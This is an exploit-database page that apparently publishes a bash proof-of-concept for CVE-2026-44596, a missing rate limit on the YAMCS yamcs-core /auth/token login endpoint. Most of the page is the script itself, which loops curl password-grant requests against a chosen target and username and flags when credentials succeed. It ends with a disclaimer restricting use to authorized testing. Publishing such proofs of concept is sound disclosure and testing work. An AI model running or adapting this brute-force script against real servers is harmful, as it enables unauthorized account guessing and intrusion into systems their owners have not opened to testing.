Skip to main content
Home/Exploits/WebApps/YAMCS yamcs-core 5.12.7 – No Rate Limiting
EXPLOIT

YAMCS yamcs-core 5.12.7 – No Rate Limiting

CVE ID: CVE-2026-44596
Vulnerability Type: Unknown
Author: Daniel Miranda
Categories: WebApps

YAMCS yamcs-core 5.12.7 – No Rate Limiting

Proof of Concept (PoC)

poc.sh 
# Exploit Title: YAMCS yamcs-core  5.12.7 - No Rate Limiting 
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44596
# Category: Remote / Brute Force
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4

#!/bin/bash
# ============================================================
# CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token
# ============================================================
# Vulnerability: POST /auth/token accepts unlimited login
#                attempts with no rate limiting or lockout.
# Impact:        Unauthenticated brute-force of any account.
# Affected:      yamcs-core < 5.12.7
# Fixed in:      yamcs-core 5.12.7
# CWE:           CWE-307
# CVSS:          5.3 MEDIUM
# ============================================================
# Usage: ./poc.sh [target] [username] [attempts]
# Example: ./poc.sh http://localhost:8090 operator 20
# ============================================================

TARGET="${1:-http://localhost:8090}"
USERNAME="${2:-operator}"
ATTEMPTS="${3:-20}"
LAST_STATUS=""

echo "============================================================"
echo " CVE-2026-44596 — YAMCS No Rate Limiting PoC"
echo " Target:   $TARGET"
echo " Username: $USERNAME"
echo " Attempts: $ATTEMPTS"
echo "============================================================"
echo ""
echo "[*] Sending $ATTEMPTS unauthenticated login attempts..."
echo "[*] Vulnerable: HTTP 401 every time, never HTTP 429"
echo ""

for i in $(seq 1 $ATTEMPTS); do
    RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" 
        -X POST "$TARGET/auth/token" 
        -H "Content-Type: application/x-www-form-urlencoded" 
        -d "grant_type=password&username=$USERNAME&password=wrongpass$i")

    echo "  Attempt $i/$ATTEMPTS: HTTP $RESPONSE"
    LAST_STATUS=$RESPONSE

    if [ "$RESPONSE" = "429" ]; then
        echo ""
        echo "[+] HTTP 429 received — rate limiting active (PATCHED)"
        exit 0
    fi

    if [ "$RESPONSE" = "200" ]; then
        echo ""
        echo "[!!!] HTTP 200 — credentials found at attempt $i"
        exit 0
    fi
done

echo ""
if [ "$LAST_STATUS" = "401" ]; then
    echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected"
    echo "[!!!] Brute-force possible without restriction"
fi

echo ""
echo "============================================================"
echo " Fix: Upgrade to yamcs-core >= 5.12.7"
echo "============================================================"

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...